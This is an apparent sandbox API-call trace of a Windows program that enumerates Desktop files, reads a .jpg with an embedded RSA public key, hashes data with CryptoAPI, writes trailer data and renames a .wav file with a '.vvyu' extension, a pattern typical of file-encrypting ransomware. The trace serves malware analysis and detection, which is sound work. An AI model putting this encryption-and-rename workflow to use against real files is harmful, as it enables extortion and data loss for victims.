0x2ae2578 [0188.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d850 [0188.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d880 [0188.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d928 [0188.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8e0 [0188.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2f5b18 [0188.259] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2f5b18, Size=0x218) returned 0x2ae58c8 [0188.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2ae5ae8 [0188.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d880 | out: hHeap=0x2c0000) returned 1 [0188.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8e0 | out: hHeap=0x2c0000) returned 1 [0188.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d928 | out: hHeap=0x2c0000) returned 1 [0188.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ae8 | out: hHeap=0x2c0000) returned 1 [0188.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d928 [0188.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0188.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d8e0 [0188.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d880 [0188.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0188.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0188.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0188.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0188.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0188.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8e0 | out: hHeap=0x2c0000) returned 1 [0188.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d880 | out: hHeap=0x2c0000) returned 1 [0188.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d928 | out: hHeap=0x2c0000) returned 1 [0188.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae58c8 | out: hHeap=0x2c0000) returned 1 [0188.262] GetCurrentThreadId () returned 0x5d8 [0188.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0188.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ee260 [0188.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0188.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0188.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0188.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.263] GetCurrentThreadId () returned 0x5d8 [0188.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0188.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.263] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0188.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0188.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d928 [0188.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0188.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0188.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d880 [0188.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0188.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d8e0 [0188.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d868 [0188.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d940 [0188.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0188.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d910 [0188.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8f8 [0188.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d958 [0188.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8f8 | out: hHeap=0x2c0000) returned 1 [0188.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d8f8 [0188.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d910 | out: hHeap=0x2c0000) returned 1 [0188.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0188.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d880 | out: hHeap=0x2c0000) returned 1 [0188.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d880 [0188.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2ae58c8 [0188.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d928 | out: hHeap=0x2c0000) returned 1 [0188.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d958 | out: hHeap=0x2c0000) returned 1 [0188.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2ae5ad8 [0188.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d880 | out: hHeap=0x2c0000) returned 1 [0188.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2ae5cf0 [0188.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0188.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ad8 | out: hHeap=0x2c0000) returned 1 [0188.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5cf0 | out: hHeap=0x2c0000) returned 1 [0188.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8f8 | out: hHeap=0x2c0000) returned 1 [0188.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d940 | out: hHeap=0x2c0000) returned 1 [0188.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8e0 | out: hHeap=0x2c0000) returned 1 [0188.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d868 | out: hHeap=0x2c0000) returned 1 [0188.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d850 | out: hHeap=0x2c0000) returned 1 [0188.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2578 | out: hHeap=0x2c0000) returned 1 [0188.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae58c8 | out: hHeap=0x2c0000) returned 1 [0188.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0188.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.284] WriteFile (in: hFile=0x584, lpBuffer=0x2ae3ea0*, nNumberOfBytesToWrite=0x1a1d, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae3ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x1a1d, lpOverlapped=0x0) returned 1 [0188.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.284] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1a22, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.285] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0188.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2ae3ea0 [0188.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ae3ea0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2ae42d0 [0188.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.286] WriteFile (in: hFile=0x584, lpBuffer=0x2ae42d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae42d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae42d0 | out: hHeap=0x2c0000) returned 1 [0188.286] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.286] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.286] CloseHandle (hObject=0x584) returned 1 [0188.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0188.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2ae3ea0 [0188.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0188.288] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\E 8rOnJ1a8nkX -7zzxk.wav" (normalized: "c:\\users\\keecfmwgj\\desktop\\e 8ronj1a8nkx -7zzxk.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\E 8rOnJ1a8nkX -7zzxk.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\e 8ronj1a8nkx -7zzxk.wav.vvyu")) returned 1 [0188.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.291] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0188.294] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fe2f250, ftCreationTime.dwHighDateTime=0x1d8977f, ftLastAccessTime.dwLowDateTime=0xd8a72fe0, ftLastAccessTime.dwHighDateTime=0x1d89992, ftLastWriteTime.dwLowDateTime=0xd8a72fe0, ftLastWriteTime.dwHighDateTime=0x1d89992, nFileSizeHigh=0x0, nFileSizeLow=0x107d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eSfxo-E.jpg", cAlternateFileName="")) returned 1 [0188.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2578 [0188.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ed40 [0188.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2578 | out: hHeap=0x2c0000) returned 1 [0188.294] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\eSfxo-E.jpg") returned=".jpg" [0188.294] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\eSfxo-E.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\esfxo-e.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.294] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=67543) returned 1 [0188.294] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.298] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x107b1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.298] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.299] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.299] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x107d7, lpOverlapped=0x0) returned 1 [0188.300] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.300] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.300] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.300] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.301] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.301] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.301] CryptGetHashParam (in: 